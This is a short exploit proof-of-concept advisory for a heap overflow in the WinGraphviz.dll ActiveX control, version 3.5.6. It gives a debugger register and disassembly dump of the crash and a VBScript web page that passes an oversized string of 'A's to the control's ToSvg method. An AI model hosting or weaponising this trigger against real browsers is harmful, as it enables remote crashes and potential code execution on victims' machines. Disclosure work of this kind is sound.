Exploit Title: WinGraphviz.dll Remote Heap Overflow PoC Date: July 15, 2012 Author: coolkaveh coolkaveh@rocketmail.com Https://twitter.com/coolkaveh Vendor Homepage: http://www.beyondsecurity.com/ Version: 3.5.6 Tested on: windows 7 SP1 Exploiting the Exploiters What kind of crappy fuzzer is that ? ======== Registers: -------------------------------------------------------------------------- EIP 01637FFB EAX 41414141 EBX 01630000 -> 00905A4D -> Asc: MZMZ ECX 016FF838 -> Asc: AAAAAAAAAAAAAAAAAAAA@AAAAAAAAAAAAAAAAAAAAAAAAAAAAA EDX 41414141 EDI 00000000 ESI 00000000 EBP 0013FD24 -> 0013FD34 ESP 0013FD10 -> 0013FD34 Block Disassembly: -------------------------------------------------------------------------- 1637FE9 CMP DWORD PTR [EAX+10],0 1637FED JE SHORT 01638042 1637FEF MOV ECX,[EBP+8] 1637FF2 MOV EDX,[ECX+10] 1637FF5 MOV [EBP-4],EDX 1637FF8 MOV EAX,[EBP-4] 1637FFB CMP DWORD PTR [EAX],0 <--- CRASH 1637FFE JE SHORT 01638042 1638000 MOV ECX,[EBP-4] 1638003 CMP DWORD PTR [ECX+10],0 1638007 JE SHORT 0163801B 1638009 MOV EDX,[EBP-4] 163800C MOV EAX,[EDX+10] 163800F MOV ECX,[EBP-4] 1638012 MOV EDX,[ECX+10] ArgDump: ---------------------------------------------------------------------------- EBP+8 016FF838 -> Asc: AAAAAAAAAAAAAAAAAAAA@AAAAAAAAAAAAAAAAAAAAAAAAAAAAA EBP+12 016FF838 -> Asc: AAAAAAAAAAAAAAAAAAAA@AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ============================================================================ <html> Test Exploit page <object classid='clsid:684811FB-0523-420F-9E8F-A5452C65A19C' id='fuzzer' ></object> <script language='vbscript'> arg1=String(2068, "A") fuzzer.ToSvg arg1 </script>